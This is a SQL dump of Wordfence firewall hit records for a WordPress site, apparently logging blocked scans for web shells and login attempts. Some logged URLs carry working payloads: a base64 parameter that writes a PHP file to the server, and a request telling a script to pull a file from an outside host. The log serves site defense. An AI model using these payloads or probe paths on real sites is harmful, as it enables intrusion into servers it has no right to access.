(50685, 1711791829.728154, 1711791828.583500, '\0\0\0\0\0\0\0\0\0\0ÿÿ€ÇÉ', 0, 403, 0, 0, 0, 'https://happythinking.com/', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Lw==","category":"brute-force","ssl":1}'),
(50670, 1711731879.384910, 1711731879.009200, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-includes/repeater.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtaW5jbHVkZXMvcmVwZWF0ZXIucGhw","category":"brute-force","ssl":1}'),
(50543, 1711442122.459591, 1711442122.119600, '\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4z', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/wp-admin/inputs.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWFkbWluL2lucHV0cy5waHA=","category":"brute-force","ssl":1}'),
(50540, 1711400544.663242, 1711400544.024300, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2Nxc3BzLnBocCcsJ3crJyksJzw%2FcGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs%3D', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVpbGQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9iaWxlIFNhZmFyaS81MzcuMzY=","path":"L3dwLWFkbWluL2Nzcy9jb2xvcnMvYmx1ZS9ibHVlLnBocA==","category":"brute-force","ssl":1}'),
(50539, 1711400547.336361, 1711400546.617700, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVpbGQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9iaWxlIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50561, 1711583775.106165, 1711583774.692800, '\0\0\0\0\0\0\0\0\0\0ÿÿ“-H½', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', 'https://www.happythinking.com/wp-login.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(50538, 1711400549.535598, 1711400548.969600, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/shell20211028.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVpbGQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9iaWxlIFNhZmFyaS81MzcuMzY=","path":"L3NoZWxsMjAyMTEwMjgucGhw","category":"brute-force","ssl":1}'),
(50544, 0.000000, 1711467540.404532, '\0\0\0\0\0\0\0\0\0\0ÿÿMÝ˜', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', 'https://www.happythinking.com/wp-login.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50545, 1711487440.562239, 1711487440.223500, '\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4x', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50551, 1711503677.450660, 1711503677.075700, '\0\0\0\0\0\0\0\0\0\0ÿÿ3‘.''', 0, 403, 0, 0, 0, 'https://happythinking.com/chosen.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nob3Nlbi5waHA=","category":"brute-force","ssl":1}'),
(50546, 1711487432.569567, 1711487432.223100, '\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4x', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50533, 1711400561.292712, 1711400560.738800, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/themes/finley/min.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVpbGQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9iaWxlIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2ZpbmxleS9taW4ucGhw","category":"brute-force","ssl":1}'),
(50553, 0.000000, 1711513355.034656, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=»%', 0, 503, 0, 0, 0, 'https://happythinking.com//wp-login.php?wp_lang=en_US', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL);
INSERT INTO `wpou_wfhits` VALUES
(50554, 0.000000, 1711538586.430799, '\0\0\0\0\0\0\0\0\0\0ÿÿe', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50555, 0.000000, 1711545266.002486, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=»%', 0, 503, 0, 0, 0, 'https://mail.happythinking.com//wp-login.php?wp_lang=en_US', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50532, 1711400563.549733, 1711400562.748300, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/M1.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVpbGQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9iaWxlIFNhZmFyaS81MzcuMzY=","path":"L00xLnBocA==","category":"brute-force","ssl":1}'),
(50565, 1711583770.218589, 1711583769.815200, '\0\0\0\0\0\0\0\0\0\0ÿÿ“-H½', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', 'https://www.happythinking.com/wp-login.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(50566, 1711583768.973235, 1711583768.566200, '\0\0\0\0\0\0\0\0\0\0ÿÿ“-H½', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', 'https://www.happythinking.com/wp-login.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(50531, 1711400565.917171, 1711400565.128900, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-head.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVpbGQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9iaWxlIFNhZmFyaS81MzcuMzY=","path":"L3dwLWhlYWQucGhw","category":"brute-force","ssl":1}'),
(50567, 0.000000, 1711590104.253528, '\0\0\0\0\0\0\0\0\0\0ÿÿgnVÙ', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50523, 1711401271.279317, 1711401270.387900, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/core-stab/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIvaW5kZXgucGhw","category":"brute-force","ssl":1}'),
(50574, 1711655644.173443, 1711655643.403700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wp-content/about.php?520=', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvYWJvdXQucGhw","category":"brute-force","ssl":1}'),
(50524, 1711401268.280159, 1711401267.504800, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/themes/classic/inc/RxRpwyvq.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2NsYXNzaWMvaW5jL1J4UnB3eXZxLnBocA==","category":"brute-force","ssl":1}'),
(50593, 1711720335.368720, 1711720334.929700, '\0\0\0\0\0\0\0\0\0\0ÿÿ^œ@', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/themes/about.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(50573, 1711655678.903455, 1711655678.262400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/admin.php?520=', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FkbWluLnBocA==","category":"brute-force","ssl":1}'),
(50525, 1711401265.348013, 1711401264.670300, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/themes/classic/inc/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2NsYXNzaWMvaW5jL2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(50568, 0.000000, 1711602671.476337, '\0\0\0\0\0\0\0\0\0\0ÿÿÎTf', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50569, 0.000000, 1711645517.919540, '\0\0\0\0\0\0\0\0\0\0ÿÿWìW', 0, 200, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'loginFailInvalidUsername', NULL, NULL),
(50570, 0.000000, 1711645528.093525, '\0\0\0\0\0\0\0\0\0\0ÿÿ,ëÓè', 0, 200, 0, 0, 0, 'https://www.happythinking.com/?_wfsf=detectProxy', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1', 'scan:detectproxy', NULL, NULL),
(50530, 1711400568.461149, 1711400567.510600, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/class.api.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVpbGQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9iaWxlIFNhZmFyaS81MzcuMzY=","path":"L2NsYXNzLmFwaS5waHA=","category":"brute-force","ssl":1}'),
(50571, 1711655722.465183, 1711655721.498500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/style.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3N0eWxlLnBocA==","category":"brute-force","ssl":1}'),
(50529, 1711401253.521599, 1711401252.534600, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/rindex.php?parameter=RxRumykc.php%7Chttp%3A%2F%2Fndot.us%2Fza&action=add', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JpbmRleC5waHA=","category":"brute-force","ssl":1}'),
(50528, 1711401257.186923, 1711401255.799000, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/RxRumykc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L1J4UnVteWtjLnBocA==","category":"brute-force","ssl":1}'),
(50606, 1711731991.872358, 1711731991.490200, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-content/plugins/seoplugins/db.php?u=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtY29udGVudC9wbHVnaW5zL3Nlb3BsdWdpbnMvZGIucGhw","category":"brute-force","ssl":1}'),
